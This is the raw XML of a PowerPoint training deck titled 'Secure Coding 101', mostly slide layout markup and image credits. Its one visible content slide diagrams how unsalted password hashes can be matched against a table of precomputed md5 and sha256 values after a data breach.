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4"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="373" r:id="rId3"/>
    <p:sldId id="389" r:id="rId4"/>
    <p:sldId id="383" r:id="rId5"/>
    <p:sldId id="375" r:id="rId6"/>
    <p:sldId id="376" r:id="rId7"/>
    <p:sldId id="259" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="261" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="264" r:id="rId12"/>
    <p:sldId id="266" r:id="rId13"/>
    <p:sldId id="267" r:id="rId14"/>
    <p:sldId id="268" r:id="rId15"/>
    <p:sldId id="269" r:id="rId16"/>
    <p:sldId id="270" r:id="rId17"/>
    <p:sldId id="377" r:id="rId18"/>
    <p:sldId id="272" r:id="rId19"/>
    <p:sldId id="378" r:id="rId20"/>
    <p:sldId id="379" r:id="rId21"/>
    <p:sldId id="275" r:id="rId22"/>
    <p:sldId id="380" r:id="rId23"/>
    <p:sldId id="381" r:id="rId24"/>
    <p:sldId id="382" r:id="rId25"/>
    <p:sldId id="386" r:id="rId26"/>
    <p:sldId id="257" r:id="rId27"/>
    <p:sldId id="258" r:id="rId28"/>
    <p:sldId id="273" r:id="rId29"/>
    <p:sldId id="278" r:id="rId30"/>
    <p:sldId id="279" r:id="rId31"/>
    <p:sldId id="274" r:id="rId32"/>
    <p:sldId id="277" r:id="rId33"/>
    <p:sldId id="304" r:id="rId34"/>
    <p:sldId id="308" r:id="rId35"/>
    <p:sldId id="307" r:id="rId36"/>
    <p:sldId id="309" r:id="rId37"/>
    <p:sldId id="311" r:id="rId38"/>
    <p:sldId id="310" r:id="rId39"/>
    <p:sldId id="323" r:id="rId40"/>
    <p:sldId id="271" r:id="rId41"/>
    <p:sldId id="314" r:id="rId42"/>
    <p:sldId id="315" r:id="rId43"/>
    <p:sldId id="276" r:id="rId44"/>
    <p:sldId id="318" r:id="rId45"/>
    <p:sldId id="345" r:id="rId46"/>
    <p:sldId id="280" r:id="rId47"/>
    <p:sldId id="325" r:id="rId48"/>
    <p:sldId id="324" r:id="rId49"/>
    <p:sldId id="326" r:id="rId50"/>
    <p:sldId id="328" r:id="rId51"/>
    <p:sldId id="327" r:id="rId52"/>
    <p:sldId id="335" r:id="rId53"/>
    <p:sldId id="329" r:id="rId54"/>
    <p:sldId id="330" r:id="rId55"/>
    <p:sldId id="331" r:id="rId56"/>
    <p:sldId id="332" r:id="rId57"/>
    <p:sldId id="333" r:id="rId58"/>
    <p:sldId id="336" r:id="rId59"/>
    <p:sldId id="337" r:id="rId60"/>
    <p:sldId id="338" r:id="rId61"/>
    <p:sldId id="339" r:id="rId62"/>
    <p:sldId id="340" r:id="rId63"/>
    <p:sldId id="341" r:id="rId64"/>
    <p:sldId id="342" r:id="rId65"/>
    <p:sldId id="343" r:id="rId66"/>
    <p:sldId id="344" r:id="rId67"/>
    <p:sldId id="346" r:id="rId68"/>
    <p:sldId id="347" r:id="rId69"/>
    <p:sldId id="348" r:id="rId70"/>
    <p:sldId id="349" r:id="rId71"/>
    <p:sldId id="350" r:id="rId72"/>
    <p:sldId id="351" r:id="rId73"/>
    <p:sldId id="352" r:id="rId74"/>
    <p:sldId id="357" r:id="rId75"/>
    <p:sldId id="359" r:id="rId76"/>
    <p:sldId id="355" r:id="rId77"/>
    <p:sldId id="353" r:id="rId78"/>
    <p:sldId id="354" r:id="rId79"/>
    <p:sldId id="360" r:id="rId80"/>
    <p:sldId id="361" r:id="rId81"/>
    <p:sldId id="362" r:id="rId82"/>
    <p:sldId id="363" r:id="rId83"/>
    <p:sldId id="364" r:id="rId84"/>
    <p:sldId id="365" r:id="rId85"/>
    <p:sldId id="370" r:id="rId86"/>
    <p:sldId id="366" r:id="rId87"/>
    <p:sldId id="367" r:id="rId88"/>
    <p:sldId id="368" r:id="rId89"/>
    <p:sldId id="369" r:id="rId90"/>
    <p:sldId id="371" r:id="rId91"/>
    <p:sldId id="372" r:id="rId92"/>
    <p:sldId id="392"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516EA9"/>
    <a:srgbClr val="FF9300"/>
    <a:srgbClr val="3A4E7A"/>
    <a:srgbClr val="1E1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13"/>
    <p:restoredTop sz="94652"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="128" d="100"/>
          <a:sy n="128" d="100"/>
        </p:scale>
        <p:origin x="10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1BE9B-B28A-534E-99BB-0FB9758AB301}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>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DCF6-D657-214F-ADCB-EB58C3EF81FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217760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EAD91-72FD-DF43-ADB4-7A15AC909A10}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102635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63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20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1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80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89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2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72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397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88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74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0EAD91-72FD-DF43-ADB4-7A15AC909A10}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2133500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73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84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99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80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46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19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50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63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779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140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F512C-E508-B04B-B501-A37C1E66E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936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399650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97471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2613008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0674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DBD55-26DB-1C4F-8078-64604A03B62A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/10/19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5079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4DBD55-26DB-1C4F-8078-64604A03B62A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/10/19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099366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4DBD55-26DB-1C4F-8078-64604A03B62A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/10/19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20191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4DBD55-26DB-1C4F-8078-64604A03B62A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/10/19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5126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DBD55-26DB-1C4F-8078-64604A03B62A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/10/19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12501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4DBD55-26DB-1C4F-8078-64604A03B62A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/10/19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55226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4DBD55-26DB-1C4F-8078-64604A03B62A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/10/19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0F987E-3369-3A45-97A9-C0D650F86D52}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1434965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DBD55-26DB-1C4F-8078-64604A03B62A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/10/19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F987E-3369-3A45-97A9-C0D650F86D52}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD4DFD10-62B8-AE49-AE3A-6A8EAA944343}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6073707" y="6356350"/>
            <a:ext cx="903899" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE4AF25E-CF1D-A041-ACDD-C8D5569CDC01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14" cstate="screen">
            <a:duotone>
              <a:schemeClr val="accent6">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
            <a:alphaModFix/>
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId15">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5944609" y="6441667"/>
            <a:ext cx="207707" cy="254173"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7D34F1B-8788-5C4B-A7E9-E59DC1A28ECB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4787649" y="6363674"/>
            <a:ext cx="1067421" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F51E175-BDCC-4640-BA60-73BC72CD00C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5646963" y="6360012"/>
            <a:ext cx="426744" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA0B9818-60E2-2741-91C1-1E5E694672C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6625245" y="6356350"/>
            <a:ext cx="779105" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dojo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13920317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9.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.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sv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33.sv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32.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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8.sv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41.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.sv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11.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId14"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pixabay.com/vectors/icon-file-extension-document-2488093/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pixabay.com/photos/knight-crusader-isolated-2939429/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pixabay.com/photos/board-card-chip-computer-data-22098/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pixabay.com/photos/woman-laptop-business-blogging-3190829/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pixabay.com/photos/house-keys-key-the-door-castle-1407562/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pixabay.com/photos/question-mark-hand-drawn-solution-2123969/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pixabay.com/photos/coding-computer-hacker-hacking-1841550/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pixabay.com/photos/code-programming-love-computer-3078609/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pixabay.com/photos/europe-gdpr-data-privacy-3256079/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pixabay.com/photos/black-board-chalk-traces-school-107236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1842-7D53-6541-8131-B3C89E4E1CAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21052821">
            <a:off x="955478" y="1387112"/>
            <a:ext cx="10281044" cy="1884000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="9600" dirty="0">
                <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Secure Coding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="9600" u="sng" dirty="0">
                <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51D20830-3D2E-A14B-95AD-C0016C95F560}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21033613">
            <a:off x="1489509" y="3499121"/>
            <a:ext cx="9481245" cy="1820607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>A guide for stopping security flaws before being created ;)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183710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3016871" y="336144"/>
            <a:ext cx="10515600" cy="549275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unsalted Hash</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948004" y="144340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48004" y="2249160"/>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182888"/>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998492" y="5104258"/>
            <a:ext cx="617477" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User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532252" y="3400690"/>
            <a:ext cx="1564396" cy="1"/>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1666461" y="1879828"/>
            <a:ext cx="1638144" cy="842889"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4885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1584917" y="3667560"/>
            <a:ext cx="2546770" cy="853384"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -45278"/>
              <a:gd name="adj2" fmla="val 57632"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="77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FFFF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016871" y="1207692"/>
            <a:ext cx="2968668" cy="2304908"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="6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3937671" y="1313410"/>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nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3306922" y="2024679"/>
          <a:ext cx="2423786" cy="109728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passhash</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4792" y="4182888"/>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5442590" y="5107084"/>
            <a:ext cx="960391" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FE4F600-5B81-8C47-99BC-5D8CBC86C129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4615430" y="3754280"/>
            <a:ext cx="1318053" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data breach</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Curved Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24BC77C3-685E-0E43-B15B-A20EA9FF91F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4805878" y="3010589"/>
            <a:ext cx="1522802" cy="727525"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -15805"/>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4C19FCB7-532C-BC4F-A5E6-AE42EE5AF7C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6518029" y="3667560"/>
          <a:ext cx="2744901" cy="1097280"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="933190">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3099737838"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="669773">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="832907464"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1141938">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1141760440"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>value</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>md5</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>sha256</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1283997765"/>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ABCDEFG</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>BB74…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>E9A92A2…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="851265560"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69026FA9-52F8-EC4D-AA8E-D6D4746E6175}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6812812" y="3298228"/>
            <a:ext cx="2155334" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Precomputed hashes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18">
            <a:extLst>
